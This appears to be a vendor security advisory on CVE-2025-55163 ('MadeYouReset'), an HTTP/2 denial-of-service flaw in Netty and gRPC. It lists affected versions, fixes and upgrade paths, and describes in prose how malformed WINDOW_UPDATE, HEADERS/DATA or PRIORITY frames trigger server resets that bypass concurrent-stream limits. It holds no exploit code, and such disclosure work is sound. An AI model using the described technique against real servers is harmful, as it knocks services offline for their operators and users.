CVE-2025-55163
DDoS vulnerability in netty-codec-http2 (Maven)
What is CVE-2025-55163 About?
The MadeYouReset vulnerability is a logical DDoS flaw in the HTTP/2 protocol that exploits malformed control frames to bypass concurrent stream limits. This results in resource exhaustion and denial of service on affected servers. The exploitation is simple and can be triggered rapidly by an attacker.
Affected Software
- io.netty:netty-codec-http2
- <4.1.124.Final
- >4.2.0.Alpha1, <4.2.4.Final
- io.grpc:grpc-netty-shaded
- <1.75.0
Technical Details
The vulnerability leverages malformed HTTP/2 control frames or flow to cause the server to reset client-created streams via RST_STREAM frames. This can be triggered by primitives like a WINDOW_UPDATE frame with an invalid increment (0 or exceeding 2^31-1), HEADERS/DATA frames on a half-closed remote stream, or a PRIORITY frame with an incorrect length. The core design flaw is that while HTTP/2 has a SETTINGS_MAX_CONCURRENT_STREAMS limit, streams reset by the server (due to these malformed frames) are immediately considered not active and are removed from the counter. However, the server's backend logic continues processing these 'canceled' requests. An attacker repeatedly sends a request, then a malformed frame to trigger a server-side RST_STREAM for that stream, effectively bypassing the concurrent stream limit, exhausting server resources like CPU and memory.
What is the Impact of CVE-2025-55163?
Successful exploitation may allow attackers to cause resource exhaustion, leading to denial of service, CPU overload, and/or memory exhaustion on the target server.
What is the Exploitability of CVE-2025-55163?
Exploiting this vulnerability is of low complexity and requires no authentication or special privileges. It is a remote attack where the attacker sends crafted HTTP/2 requests directly to the server. The primary prerequisites are that the target server communicates over HTTP/2 and incorrectly handles specific malformed control frames. The ease of exploitation is high as an attacker can quickly generate an unbounded number of 'active' backend requests without the server's concurrent stream counter increasing, leading to rapid resource depletion. The risk factors include widespread HTTP/2 adoption and the subtlety of the protocol flaw.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2025-55163?
About the Fix from Resolved Security
The patch replaces calls to a local method for stream resets with direct use of the encoder’s writeRstStream method, ensuring RST_STREAM frames are handled consistently and per specification. This fixes CVE-2025-55163 by preventing improper stream state updates or information leaks when resetting unknown or errored HTTP/2 streams, thereby improving protocol compliance and security.
Available Upgrade Options
- io.netty:netty-codec-http2
- <4.1.124.Final → Upgrade to 4.1.124.Final
- io.netty:netty-codec-http2
- >4.2.0.Alpha1, <4.2.4.Final → Upgrade to 4.2.4.Final
- io.grpc:grpc-netty-shaded
- <1.75.0 → Upgrade to 1.75.0
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://github.com/grpc/grpc-java/commit/6462ef9a11980e168c21d90bbc7245c728fd1a7a
- https://nvd.nist.gov/vuln/detail/CVE-2025-55163
- https://github.com/netty/netty/security/advisories/GHSA-prj3-ccx8-p6x4
- https://osv.dev/vulnerability/GHSA-prj3-ccx8-p6x4
- https://github.com/netty/netty/security/advisories/GHSA-prj3-ccx8-p6x4
- https://github.com/netty/netty
- https://github.com/netty/netty/commit/be53dc3c9acd9af2e20d0c3c07cd77115a594cf1
What are Similar Vulnerabilities to CVE-2025-55163?
Similar Vulnerabilities: CVE-2023-44487 , CVE-2020-13749 , CVE-2021-33190 , CVE-2020-11110 , CVE-2023-38545
